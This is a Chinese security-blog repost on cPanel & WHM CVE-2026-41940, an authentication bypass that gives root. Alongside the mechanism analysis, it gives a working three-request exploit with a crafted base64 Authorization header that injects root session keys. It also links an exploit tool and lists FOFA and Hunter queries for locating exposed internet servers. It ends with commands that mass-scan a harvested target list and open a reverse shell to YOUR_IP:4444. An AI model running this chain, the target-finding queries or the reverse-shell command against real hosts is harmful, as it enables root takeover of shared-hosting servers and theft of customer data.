cPanel曝9.8分高危漏洞,无需密码直接root(附exp利用工具)

admin
admin
admin
0
文章
0
评论
2026-05-29 04:06:02 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: cPanel&WHM爆出CVSS9.8分高危漏洞CVE-2026-41940,影响11.40后所有版本,攻击者无需凭证即可通过CRLF注入、会话加密绕过和缓存提升三环节链获取root权限。文档详细分析漏洞机制并提供Exp工具实现批量扫描、密码修改和RCE等利用方式,同时给出修复版本列表和资产发现方法。 综合评分: 82 文章分类: 漏洞分析,漏洞预警,WEB安全,红队,解决方案

cover_image

cPanel曝9.8分高危漏洞,无需密码直接root(附exp利用工具)

原创

0x66安全 0x66安全

0x66安全

2026年5月19日 11:16 广东

在小说阅读器读本章

去阅读

最近,cPanel & WHM 爆出一个高危漏洞,编号 CVE-2026-41940,CVSS 评分高达 9.8(严重)。这个漏洞影响 11.40 版本之后的所有 cPanel 产品,包括 DNSOnly 和 WP Squared。攻击者不需要任何凭证,就能远程绕过身份认证,拿到服务器 root 权限。

1、产品描述

cPanel & WHM 是一套非常流行的服务器管理面板,尤其常见于共享主机环境。WHM 负责管理员级别的操作,cPanel 则给普通用户管理网站、邮箱、数据库等。全球大量主机商都在用,据称影响数百万域名,互联网上暴露的实例就有约 150 万个。另外,基于 cPanel 搭建的托管 WordPress 平台 WP Squared(WP2)同样中招。

2、影响版本

cPanel官方确认,所有cPanel & WHM版本11.40之后的版本均受此漏洞影响,包括已停止官方支持的旧版本。具体受影响的版本系列如下:

| | | | | — | — | — | | 产品系列 | 受影响版本 | 修复版本 | | cPanel & WHM 11.86.* | < 11.86.0.41 | 11.86.0.41 | | cPanel & WHM 11.110.* | < 11.110.0.97 | 11.110.0.97 | | cPanel & WHM 11.118.* | < 11.118.0.63 | 11.118.0.63 | | cPanel & WHM 11.126.* | < 11.126.0.54 | 11.126.0.54 | | cPanel & WHM 11.130.* | < 11.130.0.18 | 11.130.0.18 | | cPanel & WHM 11.132.* | < 11.132.0.29 | 11.132.0.29 | | cPanel & WHM 11.134.* | < 11.134.0.20 | 11.134.0.20 | | cPanel & WHM 11.136.* | < 11.136.0.5 | 11.136.0.5 | | WP Squared 11.136.* | < 11.136.1.7 | 11.136.1.7 |

3、漏洞描述

CVE-2026-41940 不是单个漏洞,而是三个设计缺陷串成的攻击链。单独看每个都不算严重,但连起来就能在无需任何凭证的情况下拿到 root 权限。

3.1 漏洞1:CRLF注入漏洞

cPanel的核心服务进程cpsrvd负责处理所有的HTTP和HTTPS请求,包括用户登录认证。当用户使用HTTP Basic认证方式登录时,cpsrvd会将用户提供的用户名和密码写入一个临时的预认证会话文件中。

问题在于,cpsrvd在处理密码字段时,完全绕过了本应执行的CR/LF字符清理函数filter_sessiondata()。这意味着,攻击者可以在密码字段中插入任意的换行符(\r\n),从而在会话文件中注入新的行。

举个例子,如果攻击者发送一个如下的HTTP Basic认证头:

Authorization: Basic dXNlcjphYmMNCnVzZXI9cm9vdA==

解码后得到的用户名是”user”,密码是”abc\r\nuser=root”。当cpsrvd将这个密码写入会话文件时,会生成如下内容:

user=user&nbsp;pass=abc&nbsp;user=root

这就导致会话文件中出现了两个”user”字段,为后续的攻击埋下了伏笔。

3.2 漏洞2:会话加密绕过

cPanel 本来会对会话中的敏感字段(比如密码)进行 AES-256 加密,加密密钥来自会话 cookie 中的 “ob” 部分。

但研究人员发现,如果攻击者发送一个缺少 “ob” 部分的截断 cookie,cpsrvd 竟然不会报错,而是默默跳过加密,直接把攻击者提供的明文写入磁盘。这样一来,攻击者就能完全控制会话文件的内容,不用担心加密会破坏他们注入的换行符和恶意数据。

3.3 漏洞3:会话缓存提升漏洞

cPanel采用了一种双文件会话模型来提高性能:

原始会话文件:位于/var/cpanel/sessions/raw/目录下,采用行导向的key=value格式

JSON缓存文件:位于/var/cpanel/sessions/cache/目录下,是原始会话文件的JSON序列化版本,用于快速加载

当用户请求因安全令牌检查失败时,cpsrvd的do_token_denied()处理程序会执行一个特殊的操作:它会强制重新解析原始会话文件(而不是使用现有的JSON缓存),并将解析结果重新写入JSON缓存文件。

问题在于,当解析原始会话文件时,如果存在多个相同的键,PHP的parse_ini_string()函数会保留最后一个出现的值。这意味着,攻击者通过CRLF注入的恶意键值对(如user=root、hasroot=1、tfa_verified=1)会覆盖原始的合法值,并被提升为顶级会话属性。

当do_token_denied()处理程序完成后,JSON缓存文件中就会包含攻击者注入的所有恶意属性。此时,攻击者只需要再次发送相同的会话cookie,系统就会将该会话视为一个完全认证的root用户会话。

4、完整漏洞链演示

下面是一个完整的攻击流程演示,攻击者只需要发送三个HTTP请求即可获得root权限:

1. 注入恶意数据

GET&nbsp;/login/ HTTP/1.1Host: target.example.com:2083Authorization: Basic dXNlcjphYmMNCnVzZXI9cm9vdA0KaGFzcm9vdD0xDQp0ZmFfdmVyaWZpZWQ9MQ==Cookie: session=abcdef1234567890

这个请求会在原始会话文件中注入user=roothasroot=1tfa_verified=1三个键值对。

2. 触发安全令牌拒绝

GET&nbsp;/cpsess1234567890/ HTTP/1.1Host: target.example.com:2083Cookie: session=abcdef1234567890

这个请求会因为缺少有效的安全令牌而被拒绝,同时触发do_token_denied()处理程序,将恶意键值对提升到JSON缓存中。

3. 获得root权限

GET&nbsp;/ HTTP/1.1Host: target.example.com:2083Cookie: session=abcdef1234567890

此时,系统会将攻击者的会话视为完全认证的root用户会话,攻击者可以执行任何操作。

5、漏洞复现利用

5.1 exp工具

https://github.com/Christian93111/CVE-2026-41940

支持以下功能:

  • 批量扫描

    — 从文件批量检测目标,并发执行

  • 单目标检测

    — 指定单个 URL 快速验证

  • 漏洞利用

  • 修改 root 密码 (-passwd)

  • 调用任意 WHM API (-api)

  • 生成一键登录 URL (-session)

  • 远程命令执行 / RCE (-cmd)

  • 反弹shell

5.2 资产目标定位

鹰图搜索语法

web.body="cPanel/WHM"

fofa搜索语法

1、(header="cPanel"&nbsp;&& (port="2083"&nbsp;|| port="2087")) && product="cPanel-WHM"2、(port="2083"&nbsp;|| port="2087"&nbsp;&& title="cPanel"&nbsp;|| title="WHM") && product="cPanel-WHM"

访问对应站点资产目标,web界面如下:

5.3 漏洞利用

将搜索到的资产下载保存到1个txt文件中,然后使用exp工具进行测试,命令如下

python exploit.py --target-file&nbsp;ip.txt

点到为止,验证出存在该漏洞,可以使用下面命令获取反弹shell

python&nbsp;exploit.py --target https://target:2087&nbsp;--revshell YOUR_IP&nbsp;4444

📎 获取方法

整理了一份常用工具和笔记,后台回复:资料

回复加群获取交流群

⚠️ 最后必看 – 免责声明

文章中的案例或工具仅面向合法授权的企业安全建设行为,请自行搭建靶机环境,勿用于非法行为。如用于其他用途,由使用者承担全部法律及连带责任。

本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用。

如您在使用过程中存在任何非法行为,需自行承担相应后果。本工具来源于网络,若有侵权请联系删除,请勿用于商业行为!

📚 往期推荐

微信号: 关注公众号获取 | 扫码关注了解更多

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:0x66安全 0x66安全 0x66安全《cPanel曝9.8分高危漏洞,无需密码直接root(附exp利用工具)》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
13.分析界面与可视化组件 网络安全文章

13.分析界面与可视化组件

文章总结: 本章详细讲解了如何构建AI驱动的二进制安全分析平台的可视化界面组件,重点实现反汇编视图、控制流图、十六进制视图等多面板协同分析系统。通过集成Mona
05-290 评论
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0